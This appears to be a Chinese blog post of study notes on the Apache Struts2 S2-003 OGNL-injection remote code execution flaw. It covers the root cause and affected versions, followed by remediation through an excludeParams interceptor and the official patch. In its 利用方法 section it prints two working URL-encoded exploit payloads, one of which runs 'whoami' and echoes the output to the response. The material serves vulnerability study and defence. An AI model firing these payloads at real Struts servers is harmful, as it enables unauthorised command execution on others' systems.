(RCE)(Struts2)(笔记)s2-003漏洞学习笔记

最新推荐文章于 2024-12-19 11:09:06 发布
原创 最新推荐文章于 2024-12-19 11:09:06 发布 · 465 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#struts #笔记 #学习 #安全 #web安全

写在前面

这篇文章是关于作者学习s2-003漏洞的笔记
关于这篇文章,如果有建议或问题请留言或联系h3llow0rld@foxmail.com

正文

漏洞分析

漏洞详情页
这个漏洞环境vulhub没有准备
可以在该仓库获取演示demo:环境代码获取
如果不会启动项目的,看看这篇文章
如果想远程调试,参考这篇文章

影响版本

Struts 2.0.0 - Struts 2.1.8.1

漏洞原理

struts会将接收到的参数当作OGNL进行解析,并且对接收到的参数的过滤机制有缺陷:在com.opensymphony.xwork2.interceptor.ParameterFilterInterceptor中,匹配用户输入的正则表达式为:

this.acceptedParamNames = "[\\p{Graph}&&[^,#:=]]*";
利用条件/测试情景

1.利用条件
默认配置即可
2.测试情景
struts2应用的任何页面都可以测试

利用方法

验证PoC:(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\%27calc\%27)%27)(bla)(bla)
如果是Linux,将calc替换为touch /tmp/success,然后检查tmp目录

有回显PoC:(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&(%27\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\u0023mycmd\u003d\%27whoami\%27%27)(bla)(bla)&(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)%27)(bla)(bla)&(A)((%27\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())%27)(bla))&(B)((%27\u0023myres\u003dnew\40byte[51020]%27)(bla))&(C)((%27\u0023mydat.readFully(\u0023myres)%27)(bla))&(D)((%27\u0023mystr\u003dnew\40java.lang.String(\u0023myres)%27)(bla))&(%27\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\u0023myout.getWriter().println(\u0023mystr)%27)(bla))

如何修复
紧急处理方法(仅供参考)

在struts.xml中配置ParameterInterceptor来过滤恶意字符

<interceptor-ref name="params">
    <param name="excludeParams">dojo\..*,^struts\..*,.*\\.*,.*\(.*,.*\).*,.*@.*</param>
</interceptor-ref>

观察恶意流量的特征,设置安全设备的防护规则

补丁修复方法

官方为 OgnlValueStack 添加了新的 allowStaticMethodAccess 属性,该属性默认为false,禁止静态方法的调用,但是没有从根本上进行修复漏洞

h4ckb0ss
关注
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 4342
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
2024HW面试 中高级面试面经背诵笔记(持续更新)
weixin_51339377的博客
06-09 837
注册表下\HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下的Names可以看到所有用户 包括影子用户。netstat -ano | findstr "ESTABLISHED" #可以在所有的网络连接中查看进程PID建立的连接。通过netstat定位出pid后 可以用 tasklist | find "3389" 来查看相应pid具体的应用程序。管理员权限用 netstat -anb 快速定位所有的端口对应的应用程序。常见数据库的端口,Vnc的端口等。
Struts2 S2-003
卧龙居
10-24 2374
Struts2 S2-003影响的版本是低于2.0.12以下的,所以搭建的环境使用低于2.0.12的最近一次版本,2.0.11.2。 环境搭建: 1.项目结构: 2.pom.xml里的配置: 3.web.xml的配置: 4.struts.xml的配置 : 5.LoginAction.java代码: 6.ind
『Java安全Struts2 2.1.8.1 参数名OGNL注入漏洞S2-003复现与浅析
Ho1aAs‘s Blog
08-01 1540
Struts2解析参数名称使用了OGNL表达式,构建恶意OGNL表达式会造成注入。
渗透测试--Struts2框架
qq_53003652的博客
10-08 1626
Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。在我国strust2被广泛使用与各种战略性资产,Struts 2Struts的下一代产品,但和一代相比架构有很大的区别,近年也是爆出了很多的高危漏洞,本文旨在帮助大家理解在渗透测试中strust2的测试手法以及基本原理。
Struts2中的拦截器详解
徐刘根的博客
05-24 5992
拦截器是什么拦截器是一种可以在让用户在Action执行之前和Result执行之后进行一些功能处理的机制。 拦截器在action执行之前和result执行之后的顺序是相反的,可以看下图: 也就是说执行的顺序是:Interceptor1—Interceptor2—Interceptor3—Action—Result–Interceptor3—-Interceptor2-Interceptor1拦截
Apache Struts RCE (CVE-2024-53677),附多线程验证脚本+burpsuite的poc
最新发布
2202_75361164的博客
12-19 1867
对目前的Apache Struts RCE (CVE-2024-53677)的poc进行总结,由于只能单个ip验证,所以自己更改一下代码,实现:多线程读取url验证并保存,更改为中文解释。
Struts2 漏洞集合
WLANQY的博客
01-13 2476
而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数,这个函数刚好又能执行OGNL表达式,同时这个 getText() 的 参数输入点,又可以被用户直接进行控制,如果这个点被恶意攻击者所控制,就可以构造恶意执行代码,从而实现一个RCE攻击。,但是,由于它只涉及参数的名称,因此结果是基于将可接受的参数名称列入白名单并拒绝评估参数中包含的表达式的结果修复名称,仅部分关闭了漏洞
Apache Struts < 6.4.0 路径穿越文件上传RCE漏洞【PoC已公开】
鸭梨山大。
12-17 1145
Apache Struts是美国阿帕奇(Apache)基金会的开源Web项目,是一套用于创建企业级Java Web应用的开源MVC框架。受影响的版本中,Apache Struts 中FileUploadInterceptor逻辑存在缺陷,由于上传参数绑定过程中存在OGNL解析,攻击者可利用OGNL表达式修改文件名实现参数绑定,控制文件上传参数导致路径遍历,从而上传恶意文件到服务器执行任意代码。
Struts2远程代码执行漏洞复现
02-04 875
Struts2远程代码执行漏洞介绍、原理和复现,以及怎么使用工具检测。
Struts 2.2.3 DOS漏洞与java 浮点拒绝服务漏洞
七彩阳光java
06-21 305
在网上看到一篇让我震精的文章,转发在此,原文地址:[url]http://www.inbreak.net/archives/274[/url] 保留原文作者版权 在struts2webwork中,曾出现了远程代码执行漏洞,但是后来因为补丁会导致部分应用出现BUG,所以官方又给出了2次补丁。这次的修补,重新开启一个小小的功能,也同时开启了一个必杀dos炸***弹。这个炸***弹...
Apache修复 Struts 2 中的严重 RCE 漏洞
smellycat000的专栏
12-13 730
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Apache Struts 2 宣布修复11月披露的漏洞CVE-2024-53677。该漏洞的CVSS v3 评分为9.5,CVSS v4 评分为9.8。远程攻击者无需任何权限,即可利用该漏洞,对系统机密性、完整性和可用性造成严重影响。Apache Foundation很可能并未披露该漏洞的最危险之处,以便客户有时间更新至安全版本Struts 6...
Struts2-057 两个版本RCE漏洞分析(含EXP)
mingyqf的博客
03-21 706
云影实验室 2018-08-27 10:15:02 485149 2 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 前言 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。 该漏洞是由于在Struts2开发框架中使
S2-003 远程代码执行漏洞
Fly_鹏程万里
12-14 1486
漏洞信息 漏洞信息页面: https://cwiki.apache.org/confluence/display/WW/S2-003 漏洞成因官方概述:XWork ParameterInterceptors bypass allows OGNL statement execution 漏洞影响: 环境搭建 s2-003漏洞的payload用到了特殊字符,在高版本tomcat中会失败,...
【研究】Struts2漏洞之S2-005漏洞环境和POC
god_Zeo的安全博客
07-01 2257
【研究】Struts2漏洞之S2-005漏洞环境和可用POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本...
[旧文系列] Struts2历史高危漏洞系列-part1:S2-001/S2-003/S2-005
mole_exp的博客
01-17 1653
文章目录关于<旧文系列>前言S2-001漏洞复现和分析可回显PoC漏洞修复S2-003漏洞复现与分析可回显PoC漏洞修复S2-005漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
Struts2漏洞分析与研究之S2-005漏洞分析
热门推荐
Exploit的小站~
05-10 3万+
 转载请注明出处:http://blog.youkuaiyun.com/u011721501?viewmode=list 1、概述 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。 S2-005则是绕过官方的安全配...
Strust2远程代码执行漏洞(S2-033)利用分析
煜铭2011
06-14 4641
5月12日,Struts官方发布安全公告称,Apache Strut2 REST插件存在漏洞,可以远程执行任意指令,该漏洞编号为S2-033(CVE-2016-3087 ),公告详情如下: 启明星辰ADLab通过分析发现,该漏洞依附于前一段时间闹得沸沸扬扬的S2-032漏洞Struts官方发布的S2-033安全公告只是针对性地对REST插件功能存在的安全问题进行补充,其漏洞技术
Struts2著名RCE漏洞引发的十年之思
weixin_34018169的博客
04-19 1915
2007年7月23日发布的第一个Struts2漏洞S2-001到2017年12月发布的最新漏洞S2-055,跨度足足有十年,而漏洞的个数也升至55个。分析了Struts2的这55个漏洞发现,基本上是RCE、XSS、CSRF、DOS、目录遍历和其他功能缺陷漏洞等等。本篇文章,重点关注威胁性较大的那些著名RCE漏洞,也是***们比较喜欢利用的。 要说著名RCE(远程代码执行)漏洞Struts2框架...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值